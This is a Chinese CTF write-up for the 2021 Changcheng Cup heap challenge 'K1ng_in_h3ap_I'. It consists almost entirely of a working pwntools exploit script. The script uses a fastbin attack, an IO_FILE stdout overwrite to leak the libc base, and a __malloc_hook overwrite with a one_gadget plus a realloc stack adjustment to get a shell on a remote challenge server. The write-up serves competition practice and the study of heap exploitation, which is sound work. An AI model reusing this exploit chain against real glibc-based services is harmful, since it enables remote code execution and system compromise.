[2021 长城杯_院校组]K1ng_in_h3ap_I peiwithhao的WriteUp

版本为2.23ubuntu11.3
题目利用fastbinattack 和 io_file泄漏地址
最后还需要通过realloc调整栈

from pwn import * 
from LibcSearcher import* 
context(arch = 'amd64', os = 'linux', log_level = 'debug') 
context.terminal = ['tmux','splitw','-h']
io = process('./pwn')
#io = remote('59.110.164.72', 10066) 
io = remote("node4.anna.nssctf.cn",28529)

s   = lambda content : io.send(content)
sl  = lambda content : io.sendline(content)
sa  = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc  = lambda number : io.recv(number)
ru  = lambda content : io.recvuntil(content)

def slog(name, address): print("\033[40;31m[+]\033[40;35m"+ name + "==>" + hex(address) + "\033[0m")

def debug(): gdb.attach(io)
def get_address(): return u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))

def add(index, size):    #0x2d
    sla(b">> ", '1')
    sla(b"index:",str(index))
    sla(b'size:', str(size))

def delete(index):
    sla(b'>> ', '2')
    sla("index:", str(index))

def edit(index, content):
    sla(b">> ", '3')
    sla(b'index:', str(index))
    sla(b'context:', content)

sla(b'>> \n', '666')
ru('0x')
printf_addr = int(rc(6), 16)
slog("printf_addr", printf_addr)
libc = ELF("../tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6")
stdout_2 = (printf_addr - 0x1f0 - 0x43)%0x10000

slog("stdout_2", stdout_2)
add(0, 0x18)

add(1, 0x28)
add(2, 0x18)
add(3, 0x68)
add(4, 0x18)
edit(0, b'\x00'*0x18+ b'\xc1')
delete(3)
delete(1)
add(5, 0x48)
edit(2, b'\x00'*0x18 + b'\x71')

edit(3, p16(stdout_2))
add(6, 0x68)
add(7, 0x68)

edit(7, b'\x00'*0x33 + p64(0xfbad1800) + p64(0)*3 + b'\x50')

libc_base = get_address() - 0x3c56a3

slog("libc_base", libc_base)

add(8, 0x68)
delete(8)
malloc_hook = libc_base + libc.sym['__malloc_hook']
slog("malloc_hook", malloc_hook)
edit(8, p64(malloc_hook - 0x18 + 0xd - 0x18))
add(1, 0x68)

add(2, 0x68)
one_gadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
shell = libc_base + one_gadget[1]
realloc = libc_base + libc.sym['realloc']
edit(2, b'\x00'*0xb + p64(shell) + p64(realloc + 13))
add(3, 0x10)
io.interactive()